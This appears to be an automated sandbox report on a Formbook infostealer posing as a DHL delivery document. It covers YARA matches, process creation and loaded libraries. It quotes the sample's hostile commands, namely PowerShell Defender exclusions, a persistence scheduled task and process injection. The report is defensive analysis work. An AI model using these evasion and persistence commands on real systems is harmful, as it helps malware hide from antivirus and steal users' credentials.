            Source: DHL_Delivery Documents.exe, 00000008.00000002.2632980952.0000000001788000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesetx.exej% vs DHL_Delivery Documents.exe
            Source: DHL_Delivery Documents.exeBinary or memory string: OriginalFilenameJeWB.exeF vs DHL_Delivery Documents.exe
            Source: DHL_Delivery Documents.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 8.2.DHL_Delivery Documents.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 8.2.DHL_Delivery Documents.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.2632121823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000012.00000002.3279751855.00000000007B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000012.00000002.3278511173.0000000000410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000013.00000002.3282139682.0000000004C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.2632827623.0000000001690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000012.00000002.3279792541.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.2634283775.0000000001F30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: DHL_Delivery Documents.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: YybGLWQSx.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.DHL_Delivery Documents.exe.4351058.2.raw.unpack, RU6c2kU9YKG76GBYRe.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.DHL_Delivery Documents.exe.4351058.2.raw.unpack, RU6c2kU9YKG76GBYRe.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.DHL_Delivery Documents.exe.4351058.2.raw.unpack, RU6c2kU9YKG76GBYRe.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.DHL_Delivery Documents.exe.4351058.2.raw.unpack, W3yVFhmE2W66Gxi81U.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.DHL_Delivery Documents.exe.62c0000.5.raw.unpack, RU6c2kU9YKG76GBYRe.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.DHL_Delivery Documents.exe.62c0000.5.raw.unpack, RU6c2kU9YKG76GBYRe.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.DHL_Delivery Documents.exe.62c0000.5.raw.unpack, RU6c2kU9YKG76GBYRe.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.DHL_Delivery Documents.exe.62c0000.5.raw.unpack, W3yVFhmE2W66Gxi81U.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 9.2.YybGLWQSx.exe.24be2c4.0.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
            Source: 9.2.YybGLWQSx.exe.24ae2b8.1.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
            Source: 0.2.DHL_Delivery Documents.exe.2e6e2f0.1.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
            Source: 0.2.DHL_Delivery Documents.exe.5520000.4.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
            Source: 0.2.DHL_Delivery Documents.exe.2e5e2d8.0.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@23/16@7/2
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeFile created: C:\Users\user\AppData\Roaming\YybGLWQSx.exeJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:380:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6160:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7368:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4352:120:WilError_03
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeFile created: C:\Users\user\AppData\Local\Temp\tmp3106.tmpJump to behavior
            Source: DHL_Delivery Documents.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: DHL_Delivery Documents.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: DHL_Delivery Documents.exe, 00000000.00000000.2034502346.00000000009D2000.00000002.00000001.01000000.00000003.sdmp, setx.exe, 00000012.00000002.3280726752.000000000320C000.00000004.10000000.00040000.00000000.sdmp, setx.exe, 00000012.00000002.3279879258.000000000298E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000014.00000002.2997835182.000000000DC0C000.00000004.80000000.00040000.00000000.sdmp, YybGLWQSx.exe.0.drBinary or memory string: UPDATE [patient] SET [patientId] = @patientId, [firstName] = @firstName, [lastName] = @lastName, [mobileNumber] = @mobileNumber, [email] = @email, [userName] = @userName, [password] = @password WHERE (([patientId] = @Original_patientId) AND ([firstName] = @Original_firstName) AND ([lastName] = @Original_lastName) AND ((@IsNull_mobileNumber = 1 AND [mobileNumber] IS NULL) OR ([mobileNumber] = @Original_mobileNumber)) AND ([email] = @Original_email) AND ([userName] = @Original_userName) AND ([password] = @Original_password));
            Source: DHL_Delivery Documents.exe, 00000000.00000000.2034502346.00000000009D2000.00000002.00000001.01000000.00000003.sdmp, setx.exe, 00000012.00000002.3280726752.000000000320C000.00000004.10000000.00040000.00000000.sdmp, setx.exe, 00000012.00000002.3279879258.000000000298E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000014.00000002.2997835182.000000000DC0C000.00000004.80000000.00040000.00000000.sdmp, YybGLWQSx.exe.0.drBinary or memory string: UPDATE [patient] SET [userName] = @userName, [password] = @password, [patientId] = @patientId WHERE (([userName] = @Original_userName) AND ([password] = @Original_password) AND ([patientId] = @Original_patientId));
            Source: DHL_Delivery Documents.exe, 00000000.00000000.2034502346.00000000009D2000.00000002.00000001.01000000.00000003.sdmp, setx.exe, 00000012.00000002.3280726752.000000000320C000.00000004.10000000.00040000.00000000.sdmp, setx.exe, 00000012.00000002.3279879258.000000000298E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000014.00000002.2997835182.000000000DC0C000.00000004.80000000.00040000.00000000.sdmp, YybGLWQSx.exe.0.drBinary or memory string: INSERT INTO [patient] ([patientId], [firstName], [lastName], [mobileNumber], [email], [userName], [password]) VALUES (@patientId, @firstName, @lastName, @mobileNumber, @email, @userName, @password);
            Source: setx.exe, 00000012.00000002.3278866707.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, setx.exe, 00000012.00000002.3278866707.0000000000705000.00000004.00000020.00020000.00000000.sdmp, setx.exe, 00000012.00000002.3278866707.00000000006E2000.00000004.00000020.00020000.00000000.sdmp, setx.exe, 00000012.00000003.2891782711.00000000006D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: DHL_Delivery Documents.exeReversingLabs: Detection: 55%
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeFile read: C:\Users\user\Desktop\DHL_Delivery Documents.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\DHL_Delivery Documents.exe "C:\Users\user\Desktop\DHL_Delivery Documents.exe"
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL_Delivery Documents.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YybGLWQSx.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YybGLWQSx" /XML "C:\Users\user\AppData\Local\Temp\tmp3106.tmp"
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeProcess created: C:\Users\user\Desktop\DHL_Delivery Documents.exe "C:\Users\user\Desktop\DHL_Delivery Documents.exe"
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\YybGLWQSx.exe C:\Users\user\AppData\Roaming\YybGLWQSx.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YybGLWQSx" /XML "C:\Users\user\AppData\Local\Temp\tmp4C1F.tmp"
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeProcess created: C:\Users\user\AppData\Roaming\YybGLWQSx.exe "C:\Users\user\AppData\Roaming\YybGLWQSx.exe"
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exeProcess created: C:\Windows\SysWOW64\setx.exe "C:\Windows\SysWOW64\setx.exe"
            Source: C:\Windows\SysWOW64\setx.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL_Delivery Documents.exe"Jump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YybGLWQSx.exe"Jump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YybGLWQSx" /XML "C:\Users\user\AppData\Local\Temp\tmp3106.tmp"Jump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeProcess created: C:\Users\user\Desktop\DHL_Delivery Documents.exe "C:\Users\user\Desktop\DHL_Delivery Documents.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YybGLWQSx" /XML "C:\Users\user\AppData\Local\Temp\tmp4C1F.tmp"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeProcess created: C:\Users\user\AppData\Roaming\YybGLWQSx.exe "C:\Users\user\AppData\Roaming\YybGLWQSx.exe"Jump to behavior
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exeProcess created: C:\Windows\SysWOW64\setx.exe "C:\Windows\SysWOW64\setx.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\setx.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeSection loaded: mscoree.dllJump to behavior
